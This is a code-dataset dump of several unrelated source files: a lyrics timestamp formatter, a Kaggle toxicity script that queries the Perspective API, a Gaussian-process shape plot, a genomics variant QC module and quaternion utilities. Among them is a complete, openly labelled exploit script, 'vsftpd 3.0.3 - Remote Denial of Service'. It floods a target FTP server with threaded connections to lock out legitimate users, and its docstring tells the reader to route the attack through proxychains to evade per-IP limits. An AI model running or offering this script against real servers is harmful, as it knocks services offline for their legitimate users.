zip(line.tokens, line.timestamps):\n lrc_toks.append('[%s]%s' %\n (str(timedelta(milliseconds=tstamp))[2:-4],\n tok.strip()))\n lrc_lines.append(' '.join(lrc_toks))\n lrc_lines.append('')\n return '\\n'.join(lrc_lines)\n","sub_path":"keroaek/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":14757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334012204","text":"# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service\r\n# Date: 22-03-2021\r\n# Exploit Author: xynmaps\r\n# Vendor Homepage: https://security.appspot.com/vsftpd.html\r\n# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz\r\n# Version: 3.0.3\r\n# Tested on: Parrot Security OS 5.9.0\r\n\r\n#-------------------------------#\r\n\r\n#encoding=utf8\r\n#__author__ = XYN/Dump/NSKB3\r\n#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.\r\n\"\"\"\r\nVSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,\r\nyou can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.\r\n(if it's limited, just run this script from different proxies using proxychains, and it will work)\r\n\"\"\"\r\n\r\nimport socket\r\nimport sys\r\nimport threading\r\nimport subprocess\r\nimport time\r\n\r\nbanner = \"\"\"\r\n._________________.\r\n| VS-FTPD |\r\n| D o S |\r\n|_________________|\r\n|By XYN/DUMP/NSKB3|\r\n|_|_____________|_|\r\n|_|_|_|_____|_|_|_|\r\n|_|_|_|_|_|_|_|_|_|\r\n\r\n\"\"\"\r\nusage = \"{} \".format(sys.argv[0])\r\n\r\ndef test(t,p):\r\n\ts = socket.socket()\r\n\ts.settimeout(10)\r\n\ttry:\r\n\t\ts.connect((t, p))\r\n\t\tresponse = s.recv(65535)\r\n\t\ts.close()\r\n\t\treturn 0\r\n\texcept socket.error:\r\n\t\tprint(\"Port {} is not open, please specify a port that is open.\".format(p))\r\n\t\tsys.exit()\r\ndef attack(targ, po, id):\r\n\ttry:\r\n\t\tsubprocess.Popen(\"ftp {0} {1}\".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\t\t#print(\"Worker {} running\".format(id))\r\n\texcept OSError: pass\r\ndef main():\r\n\tglobal target, port, start\r\n\tprint(banner)\r\n\ttry:\r\n\t\ttarget = sys.argv[1]\r\n\texcept:\r\n\t\tprint(usage)\r\n\t\tsys.exit()\r\n\ttry:\r\n\t\tport = int(sys.argv[2])\r\n\texcept:\r\n\t\tport = 21\r\n\ttry:\r\n\t\tconns = int(sys.argv[3])\r\n\texcept:\r\n\t\tconns = 50\r\n\tprint(\"[!] 
Testing if {0}:{1} is open\".format(target, port))\r\n\ttest(target, port)\r\n\tprint(\"[+] Port {} open, starting attack...\".format(port))\r\n\ttime.sleep(2)\r\n\tprint(\"[+] Attack started on {0}:{1}!\".format(target, port))\r\n\tdef loop(target, port, conns):\r\n\t\tglobal start\r\n\t\tthreading.Thread(target=timer).start()\r\n\t\twhile 1:\r\n\t\t\tfor i in range(1, conns + 3):\r\n\t\t\t\tt = threading.Thread(target=attack, args=(target,port,i,))\r\n\t\t\t\tt.start()\r\n\t\t\t\tif i > conns + 2:\r\n\t\t\t\t\tt.join()\r\n\t\t\t\t\tbreak\r\n\t\t\t\t\tloop()\r\n\r\n\tt = threading.Thread(target=loop, args=(target, port, conns,))\r\n\tt.start()\r\n\r\ndef timer():\r\n start = time.time()\r\n while 1:\r\n if start < time.time() + float(900): pass\r\n else:\r\n subprocess.Popen(\"pkill ftp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n t = threading.Thread(target=loop, args=(target, port,))\r\n t.start()\r\n break\r\n\r\nmain()\r\n","sub_path":"agent_sudo/49719.py","file_name":"49719.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"26130769","text":"import os\nimport requests\nimport json\nimport time\n\nimport pandas as pd\n\nfrom sklearn.metrics import roc_auc_score\n\nfrom preprocess import normalize_text\nfrom cache import get_data, is_in_cache, load_cache, save_in_cache\nfrom utils import print_step\n\n\nCONVAI_KEY = os.environ['CONVAI_KEY']\n\n\ntrain, test = get_data()\ntrain['is_train'] = 1\ntest['is_train'] = 0\nmerge = pd.concat([train.reset_index(), test.reset_index()]).drop('index', axis=1)\n\n\ndef run_query(comment_text, idx):\n value = normalize_text(comment_text)\n value = value[:2999] if len(value) >= 3000 else value\n value = 'empty' if len(value) == 0 else value\n try:\n rr = requests.post('https://commentanalyzer.googleapis.com/v1alpha1/comments:analyze', params={'key': CONVAI_KEY}, data=json.dumps({'comment': {'text': value}, 'languages': ['en'], 'requestedAttributes': {'TOXICITY': {}, 'ATTACK_ON_AUTHOR': {}, 'ATTACK_ON_COMMENTER': {}, 'INCOHERENT': {}, 'INFLAMMATORY': {}, 'LIKELY_TO_REJECT': {}, 'OBSCENE': {}, 'SEVERE_TOXICITY': {}, 'SPAM': {}, 'UNSUBSTANTIAL': {}}}))\n return [(k, v['summaryScore']['value']) for k, v in rr.json()['attributeScores'].items()] + [('id', idx)]\n except Exception as error:\n print_step('FATAL ABORT:')\n import pdb\n pdb.set_trace()\n\n\ndef run_query_in_batches(df, label=''):\n responses = []\n total = len(df.comment_text.values)\n i = 0\n while i <= total:\n skip = False\n if i % 500 == 0 or i == total:\n batch_num = str(i / 500 + 1)\n if is_in_cache('convai-batches-' + label + batch_num):\n print_step('BATCH ' + label + batch_num + ' ALREADY DONE...')\n i += 500\n skip = True\n elif len(responses) > 100:\n batch_num = str(i / 500)\n if i == total:\n batch_num = str(int(batch_num) + 1)\n skip = True\n print_step('COLLECTING BATCH ' + label + batch_num + ' / ' + str(round(total / 500) + 1))\n batch_df = pd.DataFrame([dict(x) for x in responses])\n save_in_cache('convai-batches-' + label + batch_num, batch_df, None)\n batch_num = str(i / 500 + 1)\n print_step('SLEEPING 60s')\n time.sleep(60)\n responses = []\n print_step('STARTING BATCH ' + label + batch_num)\n else:\n print_step('STARTING BATCH ' + label + batch_num)\n if not skip:\n print_step(str(i + 1) + ' / ' + str(total))\n responses.append(run_query(df.comment_text.values[i], df.id.values[i]))\n i += 1\n\nrun_query_in_batches(merge)\n\ndfs = []\nfor i in range(1, 
627):\n df = pd.read_csv('cache/train_convai-batches-' + str(i) + '.csv')\n df['batch_num'] = i\n dfs.append(df)\n\ndf = pd.concat(dfs)\nmerge2 = pd.merge(df.reset_index(), merge.reset_index(), on='id').drop(['index_x', 'index_y'], axis=1)\nprint('DUPLICATION CHECK')\nprint(merge2.duplicated('id').value_counts())\nprint('TOXIC AUC:' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['toxic'], merge2[merge2['is_train'] == 1]['TOXICITY'])))\nprint('SEVTOX AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['severe_toxic'], merge2[merge2['is_train'] == 1]['SEVERE_TOXICITY'])))\nprint('OBSCENE AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['obscene'], merge2[merge2['is_train'] == 1]['TOXICITY'])))\nprint('THREAT AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['threat'], merge2[merge2['is_train'] == 1]['SEVERE_TOXICITY'])))\nprint('INSULT AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['insult'], merge2[merge2['is_train'] == 1]['TOXICITY'])))\nprint('IDENTITY HATE AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['identity_hate'], merge2[merge2['is_train'] == 1]['SEVERE_TOXICITY'])))\n\nmissing_ids = set(merge['id'].values) - set(merge2['id'].values)\nprint('# MISSING IDS: ' + str(len(missing_ids)))\nmissing_df = merge[merge['id'].apply(lambda x: x in missing_ids)]\nimport pdb\npdb.set_trace()\n# extra_df = pd.DataFrame(dict(run_query(missing_df.comment_text.values[0], missing_df.id.values[0])), index=[1])\n# df2 = pd.concat([df, extra_df])\n# merge2 = pd.merge(df2.reset_index(), merge.reset_index(), on='id').drop(['index_x', 'index_y'], axis=1)\n\nprint('~~~~~~~~~~~')\nprint_step('Saving')\ntrain2 = merge2[merge2['is_train'] == 1]\ntest2 = merge2[merge2['is_train'] == 0]\ntrain2.drop(['comment_text', 'batch_num', 'is_train'], axis=1, inplace=True)\ntest2.drop(['comment_text', 'batch_num', 'is_train'], axis=1, inplace=True)\nprint('TOXIC AUC RECHECK: ' + str(roc_auc_score(train2['toxic'], train2['TOXICITY'])))\nprint('SEVTOX AUC RECHECK: ' + str(roc_auc_score(train2['severe_toxic'], train2['SEVERE_TOXICITY'])))\nprint('OBSCENE AUC RECHECK: ' + str(roc_auc_score(train2['obscene'], train2['TOXICITY'])))\nprint('THREAT AUC RECHECK: ' + str(roc_auc_score(train2['threat'], train2['SEVERE_TOXICITY'])))\nprint('INSULT AUC RECHECK: ' + str(roc_auc_score(train2['insult'], train2['TOXICITY'])))\nprint('IHATE AUC RECHECK: ' + str(roc_auc_score(train2['identity_hate'], train2['SEVERE_TOXICITY'])))\nsave_in_cache('convai_data', train2, test2)\n\nprint('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\nprint_step('Prepping submission file')\nsubmission = pd.DataFrame()\nsubmission['id'] = test2['id']\nsubmission['toxic'] = test2['TOXICITY']\nsubmission['severe_toxic'] = test2['SEVERE_TOXICITY']\nsubmission['obscene'] = test2['TOXICITY']\nsubmission['threat'] = test2['SEVERE_TOXICITY']\nsubmission['insult'] = test2['TOXICITY']\nsubmission['identity_hate'] = test2['SEVERE_TOXICITY']\nsubmission.to_csv('submit/submit_convai.csv', index=False)\nprint_step('Done!')\n","sub_path":"AML/codes/Asta/kaggle-toxic_comment-master/conversationai_api.py","file_name":"conversationai_api.py","file_ext":"py","file_size_in_byte":5694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"47121876","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nsys.path.append(\"../\")\n\nfrom kernel import InverseMultiquadricKernelPytouch\nfrom mtgp import GaussianProcessImplicitSurfaces\n\n\nimport numpy as np\nimport torch\nimport 
math\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as pat\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport time\nimport pickle\n\nplt.style.use('ggplot')\ncolor_cycle = list(plt.rcParams['axes.prop_cycle'].by_key()['color'])\n\n# hyper parameter\nalpha = 0.01\nkernel_param = 0.1\nrate = 0.01\nmax_iter = 1000\nlr = 0.0001\nsigma = torch.tensor(-5.168)\n\n\nplot = True\n# plot = False\nsave_data = True\nsave_data = False\nsave_movie = True\n# save_movie = False\n\n\n\ndef set_plt():\n plt.xlim(0, 0.6)\n plt.ylim(0, 0.6)\n plt.xticks(color=\"None\")\n plt.yticks(color=\"None\")\n plt.tick_params(length=0)\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['left'].set_visible(False)\n plt.gca().spines['top'].set_visible(False)\n plt.gca().spines['bottom'].set_visible(False)\n plt.axes().set_aspect('equal', 'datalim')\n\nif __name__==\"__main__\":\n # current_po = np.array([0.4, 0.55])\n current_po = np.array([0.3, 0.5]) # high high\n current_po = np.array([0.3, 0.55]) # low low\n current_po = np.array([0.3, 0.55]) # high low\n current_po = np.array([0.25, 0.55]) # low high\n current_po = np.array([0.4, 0.55]) # deco\n\n po_list = np.array([current_po])\n\n # visual data\n N1 = 10\n x1_0 = (np.concatenate([np.linspace(10, 50, N1), np.ones(N1)*50, np.linspace(50, 10, N1), np.ones(N1)*10]) ) * rate\n x1_1 = (np.concatenate([np.linspace(8, 52, N1), np.ones(N1)*52, np.linspace(52, 8, N1), np.ones(N1)*8]) ) * rate\n x1 = np.concatenate([x1_0, x1_1])[:, None]\n\n y1_0 = (np.concatenate([np.ones(N1)*10, np.linspace(10, 50, N1), np.ones(N1)*50, np.linspace(50, 10, N1)]) ) * rate\n y1_1 = (np.concatenate([np.ones(N1)*8, np.linspace(8, 52, N1), np.ones(N1)*52, np.linspace(52, 8, N1)]) ) * rate\n y1 = np.concatenate([y1_0, y1_1])[:, None]\n\n X1 = np.concatenate([x1,y1],1)\n Y1 = np.concatenate([np.zeros(len(x1_0)), np.ones(len(x1_1)) ])[:, None]\n T1 = 0\n\n # true object\n N2 = 10\n x2_0 = np.concatenate([np.ones(N2)*15, np.linspace(15, 25, N2//2), np.ones(N2)*25, np.linspace(25, 35, N2), np.ones(N2)*35, np.linspace(35, 45, N2//2), np.ones(N2)*45, np.linspace(45, 15, N2)]) * rate\n y2_0 = np.concatenate([np.linspace(15, 45, N2), np.ones(N2//2)*45, np.linspace(45, 30, N2), np.ones(N2)*30, np.linspace(30, 45, N2), np.ones(N2//2)*45, np.linspace(45, 15, N2), np.ones(N2)*15]) * rate\n\n # test data\n x = np.linspace(0, 60, 800)[:, None] * rate\n y = np.linspace(0, 60, 800)[:, None] * rate\n # x = np.linspace(0, 60, 200)[:, None] * rate\n # y = np.linspace(0, 60, 200)[:, None] * rate\n x,y = np.meshgrid(x, y)\n xx = x.ravel()[:, None]\n yy = y.ravel()[:, None]\n XX = np.concatenate([xx, yy], 1)\n XX = torch.from_numpy(XX).float()\n\n fig = plt.figure(figsize=(3.0, 3.0), dpi=300)\n ax = fig.add_subplot(111)\n\n\n kernel = InverseMultiquadricKernelPytouch([kernel_param])\n\n\n X1_t = torch.from_numpy(X1).float()\n Y1_t = torch.from_numpy(Y1).float()\n\n gp_model = GaussianProcessImplicitSurfaces(X1_t, Y1_t, kernel, sigma=sigma)\n\n mm2, ss2 = gp_model.predict(XX)\n mean_zero = np.where(abs(mm2.T[0]) < 0.03)\n surf_x = xx.T[0][mean_zero]\n surf_y = yy.T[0][mean_zero]\n var = np.array(ss2.T[0][mean_zero])\n\n\n\n ss2 = ss2.reshape(x.shape)\n z = ss2.numpy()\n xyz = plt.pcolormesh(x, y, z, cmap=cm.Purples, vmax=z.max(), vmin=z.min())\n\n outer = pat.Rectangle(xy = (0.1, 0.1), width = 0.4, height = 0.4,linewidth=2, linestyle='dashdot', ec=color_cycle[5], fill=False)\n ax.add_patch(outer)\n\n rec2 = pat.Rectangle(xy = (0.15, 0.15), width = 0.1, height = 0.3, 
color=color_cycle[5])\n rec3 = pat.Rectangle(xy = (0.25, 0.15), width = 0.1, height = 0.15, color=color_cycle[5])\n rec4 = pat.Rectangle(xy = (0.35, 0.15), width = 0.1, height = 0.3, color=color_cycle[5])\n\n ax.add_patch(rec2)\n ax.add_patch(rec3)\n ax.add_patch(rec4)\n\n plt.plot(po_list[:, 0], po_list[:, 1], '--', color='black', linewidth=2, zorder=9)\n plt.scatter(po_list[-1, 0], po_list[-1, 1], c='black', s=20, marker=\"o\",zorder=10)\n plt.scatter(surf_x, surf_y, s=3, c=color_cycle[0], zorder=8)\n set_plt()\n\n # plt.scatter(X2[:,0], X2[:,1])\n set_plt()\n plt.savefig('decoboco_initial.png', dpi=300, pad_inches=0.05)\n plt.show()\n\n","sub_path":"mtgpis_simulation/lib/create_initial_estimate_shape.py","file_name":"create_initial_estimate_shape.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"591569527","text":"import shutil\nfrom os import mkdir, makedirs\nfrom os.path import basename, join, isdir, dirname\n\nfrom src.utils import file_exists\nfrom src.my_utils import info, err, verify_file, step_greetings, \\\n get_tool_cmdline, get_java_tool_cmdline, call, verify_dir, critical\n\n\ndef check_quality_control_config(cnf):\n qc_cnf = cnf.get('quality_control')\n if not qc_cnf:\n return\n\n if 'databases' not in qc_cnf:\n qc_cnf['databases'] = ['dbsnp']\n info('Warning: not databases for quality control, using [dbsnp]')\n\n if 'novelty' not in qc_cnf:\n qc_cnf['novelty'] = ['all', 'known', 'novel']\n info('Warning: no novelty specified for quality control, '\n 'using default ' + ', '.join(qc_cnf['novelty']))\n\n if 'metrics' not in qc_cnf:\n qc_cnf['metircs'] = [\n 'nEvalVariants', 'nSNPs', 'nInsertions', 'nDeletions',\n 'nVariantsAtComp', 'compRate', 'nConcordant', 'concordantRate',\n 'variantRate', 'variantRatePerBp', 'hetHomRatio', 'tiTvRatio']\n info('Warning: no metrics for quality control, using '\n 'default ' + ', '.join(qc_cnf['metircs']))\n\n to_exit = False\n dbs_dict = {}\n for db in qc_cnf['databases']:\n if not db:\n err('Empty field for quality_control databases')\n to_exit = True\n elif file_exists(db):\n if not verify_file(db, 'Vcf'):\n to_exit = True\n dbs_dict[basename(db)] = db\n elif db not in cnf['genome']:\n to_exit = True\n err(cnf.get('log'), db + ' for variant qc is not found '\n 'in genome resources in system config.')\n else:\n dbs_dict[db] = cnf['genome'][db]\n\n if to_exit:\n exit()\n\n qc_cnf['database_vcfs'] = dbs_dict\n\n if 'summary_output' in qc_cnf or 'qc_summary_output' in cnf:\n qc_output_fpath = qc_cnf.get('summary_output') or cnf.get('qc_summary_output')\n summary_output_dir = dirname(qc_output_fpath)\n if not isdir(summary_output_dir):\n try:\n makedirs(summary_output_dir)\n except OSError:\n critical('ERROR: cannot create directory for '\n 'qc summary report: ' + summary_output_dir)\n if not verify_dir(summary_output_dir, 'qc_summary_output'):\n exit()\n\n\ndef quality_control(cnf, qc_dir, vcf_fpath):\n if 'quality_control' not in cnf:\n return None, None\n\n if not isdir(qc_dir):\n mkdir(qc_dir)\n\n qc_report_fpath = gatk_qc(cnf, qc_dir, vcf_fpath)\n qc_plots_fpaths = bcftools_qc(cnf, qc_dir, vcf_fpath)\n return qc_report_fpath, qc_plots_fpaths\n\n\ndef gatk_qc(cnf, qc_dir, vcf_fpath):\n step_greetings(cnf, 'Quality control reports')\n\n log = cnf['log']\n work_dir = cnf['work_dir']\n\n qc_cnf = cnf['quality_control']\n databases = qc_cnf.get('database_vcfs')\n novelty = qc_cnf.get('novelty')\n metrics = qc_cnf.get('metrics')\n\n executable = 
get_java_tool_cmdline(cnf, 'gatk')\n    gatk_opts_line = ' '.join(cnf.get('gatk', {'options': []}).get('options', []))\n    ref_fpath = cnf['genome']['seq']\n    report_fpath = join(work_dir, cnf['name'] + '_gatk.report')\n\n    cmdline = ('{executable} {gatk_opts_line} -R {ref_fpath} -T VariantEval'\n               ' --eval:tmp {vcf_fpath} -o {report_fpath}').format(**locals())\n\n    if 'dbsnp' in databases:\n        cmdline += ' -D ' + databases['dbsnp']\n    for db_name, db_path in databases.items():\n        if not db_name == 'dbsnp':\n            cmdline += ' -comp:' + db_name + ' ' + db_path\n\n    call(cnf, cmdline, None, report_fpath, stdout_to_outputfile=False,\n         to_remove=[vcf_fpath + '.idx'])\n\n    report = _parse_gatk_report(report_fpath, databases.keys(), novelty, metrics)\n\n    final_report_fpath = join(qc_dir, cnf['name'] + '_qc.report')\n\n    _make_final_report(report, final_report_fpath, cnf['name'],\n                       databases.keys(), novelty, metrics)\n    return final_report_fpath\n\n\ndef bcftools_qc(cnf, qc_dir, vcf_fpath):\n    step_greetings(cnf, 'Quality control plots')\n\n    work_dir = cnf['work_dir']\n\n    bgzip = get_tool_cmdline(cnf, 'bgzip')\n    tabix = get_tool_cmdline(cnf, 'tabix')\n    bcftools = get_tool_cmdline(cnf, 'bcftools')\n    plot_vcfstats = get_tool_cmdline(cnf, 'plot_vcfstats')\n    if not bgzip or not tabix or not bcftools or not plot_vcfstats:\n        exit()\n\n    gzipped_fpath = join(work_dir, basename(vcf_fpath) + '.gz')\n    cmdline = '{bgzip} -c {vcf_fpath}'.format(**locals())\n    call(cnf, cmdline, None, gzipped_fpath)\n\n    tbi_fpath = gzipped_fpath + '.tbi'\n    cmdline = '{tabix} -f -p vcf {gzipped_fpath}'.format(**locals())\n    call(cnf, cmdline, None, tbi_fpath)\n\n    text_report_fpath = join(work_dir, cnf['name'] + '_bcftools.report')\n    cmdline = '{bcftools} stats {gzipped_fpath}'.format(**locals())\n    call(cnf, cmdline, None, text_report_fpath, to_remove=[gzipped_fpath, tbi_fpath])\n\n    viz_report_dir = join(work_dir, cnf['name'] + '_qc_plots/')\n    if file_exists(viz_report_dir):\n        shutil.rmtree(viz_report_dir)\n    mkdir(viz_report_dir)\n    cmdline = '{plot_vcfstats} -s {text_report_fpath} -p {viz_report_dir} ' \\\n              '--no-PDF'.format(**locals())\n    call(cnf, cmdline, text_report_fpath, None, output_is_file=False)\n    return _get_plots_from_bcftools(cnf, viz_report_dir, qc_dir)\n\n\ndef _parse_gatk_report(report_filename, databases, novelty, metrics):\n    database_col_name = 'CompRod'\n    database_col_id = None\n    novelty_col_name = 'Novelty'\n    novelty_col_id = None\n\n    report = dict()\n    comments_section = False\n    cur_header = []\n    cur_metrics_ids = []\n    for line in open(report_filename):\n        if not line.strip():\n            continue\n        if line.startswith('#'): # comment line\n            comments_section = True\n            continue\n        elif comments_section:\n            comments_section = False\n            cur_header = line.split()\n            cur_metrics_ids = []\n            database_col_id = cur_header.index(database_col_name)\n            novelty_col_id = cur_header.index(novelty_col_name)\n            for metric in metrics:\n                if metric in cur_header:\n                    cur_metrics_ids.append(cur_header.index(metric))\n                    if metric not in report:\n                        report[metric] = dict()\n        elif cur_metrics_ids: # process lines only if there are metrics in current section\n            values = line.split()\n            cur_database = values[database_col_id]\n            cur_novelty = values[novelty_col_id]\n            if (cur_database not in databases) or (cur_novelty not in novelty):\n                continue\n            for metric_id in cur_metrics_ids:\n                if cur_database not in report[cur_header[metric_id]]:\n                    report[cur_header[metric_id]][cur_database] = dict()\n                report[cur_header[metric_id]][cur_database][cur_novelty] = values[metric_id]\n    return report\n
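\n\n# Parsed report shape: report[metric][database][novelty] -> value as a string\n# (added note; the shape follows from the assignment loop in _parse_gatk_report).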
\n\n\ndef _make_final_report(report_dict, report_filename, sample_name,\n                       databases, novelty, metrics):\n    header = ['Metric', 'Novelty'] + databases + ['Average']\n    full_report = [header]\n    for cur_metric in metrics:\n        for cur_novelty in novelty:\n            cur_row = [cur_metric, cur_novelty]\n            total = 0.0\n            for cur_database in databases:\n                if cur_metric == 'variantRatePerBp': # confusing name and value format\n                    cur_row[0] = 'basesPerVariant'\n                    cur_row.append(\"%.2f\" % float(report_dict[cur_metric][cur_database][cur_novelty]))\n                else:\n                    cur_row.append(report_dict[cur_metric][cur_database][cur_novelty])\n                total += float(cur_row[-1])\n            average = total / len(databases)\n            cur_row.append(\"%.2f\" % average)\n            full_report.append(cur_row)\n\n    col_widths = [0] * len(header)\n    for row in full_report:\n        for idx, value in enumerate(row):\n            col_widths[idx] = max(len(value), col_widths[idx])\n\n    out = open(report_filename, 'w')\n    out.write('Sample name: ' + sample_name + '\\n\\n')\n    for row in full_report:\n        out.write(' '.join('%-*s' % (col_width, value) for col_width, value\n                           in zip(col_widths, row)) + \"\\r\\n\")\n    out.close()\n\n\ndef _get_plots_from_bcftools(cnf, bcftools_report_dir, output_dir):\n    original_plots_names = ['indels.0.png', 'substitutions.0.png']\n    final_plots_names = [cnf['name'] + '_indels.png', cnf['name'] + '_substitution.png']\n    for i, original_plot in enumerate(original_plots_names):\n        plot_src_filename = join(bcftools_report_dir, original_plot)\n        plot_dst_filename = join(output_dir, final_plots_names[i])\n        if file_exists(plot_src_filename):\n            shutil.copyfile(plot_src_filename, plot_dst_filename)\n    return [join(output_dir, fname) for fname in final_plots_names]","sub_path":"src/quality_control.py","file_name":"quality_control.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"388292231","text":"# helper functions for treating float lists as quaternions\n# author: maxime.tournier@inria.fr\n\nimport sys\n\nimport math\nfrom numpy import *\nimport numpy.linalg\n\ndef id():\n    \"\"\"identity\"\"\"\n    return array([0, 0, 0, 1])\n\ndef conj(q):\n    \"\"\"conjugate\"\"\"\n    return array([-q[0], -q[1], -q[2], q[3]])\n\ndef inv(q):\n    \"\"\"\n    inverse \n\n    If you're dealing with unit quaternions, use conj instead.\n    \"\"\"\n    return conj(q) / numpy.linalg.norm(q)**2\n\ndef re(q):\n    \"\"\"real part\"\"\"\n    return q[3]\n\ndef im(q):\n    \"\"\"imaginary part\"\"\"\n    return array(q[:3])\n\ndef angle(q):\n    \"\"\"get angle in rad\"\"\"\n    return 2.0* math.acos(re(q))\n\n# TODO optimize\ndef prod(a, b):\n    \"\"\" use this product to compose the rotations represented by two quaternions \"\"\" \n    \"\"\"here is a readable version : array([ qa[3]*qb[0] + qb[3]*qa[0] + qa[1]*qb[2] - qa[2]*qb[1],qa[3]*qb[1] + qb[3]*qa[1] + qa[2]*qb[0] - qa[0]*qb[2], qa[3]*qb[2] + qb[3]*qa[2] + qa[0]*qb[1] - qa[1]*qb[0], qa[3]*qb[3] - qb[0]*qa[0] - qa[1]*qb[1] - qa[2]*qb[2] ])\"\"\"\n    return hstack( (re(a)*im(b) + re(b)*im(a) + numpy.cross( im(a), im(b) ), [re(a) * re(b) - dot( im(a), im(b))] ))\n\n# TODO optimize\ndef rotate(q, x):\n    \"\"\"vector rotation\n\n    rotates x by the rotation represented by q. 
this is also the\n adjoint map for S^3.\n\n \"\"\"\n \n # TODO assert q is unit\n return im( prod(q, prod( hstack((array(x), [0])), conj(q))) )\n\n\ndef exp(v):\n \"\"\"exponential\n Return the quaternion corresponding to the given rotation vector\n \"\"\"\n theta = numpy.linalg.norm(v)\n\n if math.fabs(theta) < sys.float_info.epsilon:\n return id()\n\n s = math.sin(theta / 2)\n c = math.cos(theta / 2)\n\n return [ v[0] / theta * s,\n v[1] / theta * s,\n v[2] / theta * s,\n c ]\n\n\ndef rotVecToQuat(v):\n \"\"\" same as exp(v) \"\"\"\n return exp(v)\n\n\n\ndef flip(q):\n \"\"\"Flip a quaternion to the real positive hemisphere if needed.\"\"\"\n \n if re(q) < 0:\n return -1*q\n else :\n return q\n\n \ndef log(q):\n \"\"\"(principal) logarithm. \n Return rotation vector corresponding to unit quaternion q\n \"\"\"\n [ axis, angle ] = quatToAxis(q)\n return angle * axis\n\n\ndef quatToRotVec(q):\n \"\"\" same as log(q) \"\"\"\n return log(q)\n\ndef normalized(q):\n ## returning the normalized quaternion (without checking for a null norm...)\n return q / numpy.linalg.norm(q)\n\n\ndef from_matrix(M, isprecise=False):\n \"\"\"Return quaternion from rotation matrix.\n If isprecise is True, the input matrix is assumed to be a precise rotation\n matrix and a faster algorithm is used.\n \"\"\"\n\n if isprecise:\n q = numpy.empty((4, ))\n t = numpy.trace(M)\n if t > M[3, 3]:\n q[0] = t\n q[3] = M[1, 0] - M[0, 1]\n q[2] = M[0, 2] - M[2, 0]\n q[1] = M[2, 1] - M[1, 2]\n else:\n i, j, k = 1, 2, 3\n if M[1, 1] > M[0, 0]:\n i, j, k = 2, 3, 1\n if M[2, 2] > M[i, i]:\n i, j, k = 3, 1, 2\n t = M[i, i] - (M[j, j] + M[k, k]) + M[3, 3]\n q[i] = t\n q[j] = M[i, j] + M[j, i]\n q[k] = M[k, i] + M[i, k]\n q[3] = M[k, j] - M[j, k]\n q *= 0.5 / math.sqrt(t * M[3, 3])\n else:\n m00 = M[0, 0]\n m01 = M[0, 1]\n m02 = M[0, 2]\n m10 = M[1, 0]\n m11 = M[1, 1]\n m12 = M[1, 2]\n m20 = M[2, 0]\n m21 = M[2, 1]\n m22 = M[2, 2]\n # symmetric matrix K\n K = numpy.array([[m00-m11-m22, 0.0, 0.0, 0.0],\n [m01+m10, m11-m00-m22, 0.0, 0.0],\n [m02+m20, m12+m21, m22-m00-m11, 0.0],\n [m21-m12, m02-m20, m10-m01, m00+m11+m22]])\n K /= 3.0\n # quaternion is eigenvector of K that corresponds to largest eigenvalue\n w, V = numpy.linalg.eigh(K)\n q = V[[3, 0, 1, 2], numpy.argmax(w)]\n\n if q[0] < 0.0:\n numpy.negative(q, q)\n\n #return q.tolist()\n return [ q[1], q[2], q[3], q[0] ] # sofa order\n\n\ndef to_matrix(quat):\n \"\"\"Convert a quaternion into rotation matrix form.\n\n @param quat: The quaternion.\n @type quat: numpy 4D, rank-1 array\n \"\"\"\n\n # Repetitive calculations.\n q4_2 = quat[3]**2\n q12 = quat[0] * quat[1]\n q13 = quat[0] * quat[2]\n q14 = quat[0] * quat[3]\n q23 = quat[1] * quat[2]\n q24 = quat[1] * quat[3]\n q34 = quat[2] * quat[3]\n\n matrix = numpy.empty((3,3))\n\n # The diagonal.\n matrix[0, 0] = 2.0 * (quat[0]**2 + q4_2) - 1.0\n matrix[1, 1] = 2.0 * (quat[1]**2 + q4_2) - 1.0\n matrix[2, 2] = 2.0 * (quat[2]**2 + q4_2) - 1.0\n\n # Off-diagonal.\n matrix[0, 1] = 2.0 * (q12 - q34)\n matrix[0, 2] = 2.0 * (q13 + q24)\n matrix[1, 2] = 2.0 * (q23 - q14)\n\n matrix[1, 0] = 2.0 * (q12 + q34)\n matrix[2, 0] = 2.0 * (q13 - q24)\n matrix[2, 1] = 2.0 * (q23 + q14)\n\n return matrix\n\ndef from_line(v, sign=1, xyz=1):\n \"\"\"\n Compute a quaternion from a line\n @param v: director vector describing the line which will be used to compute the quaternion\n @type v: list\n @param sign: to change the sign of the vector director v\n @type sign: 1 / -1\n @param xyz: to indicate if v is the axis x (xyz=1), y (xyz=2) or z (xyz=3) of the 
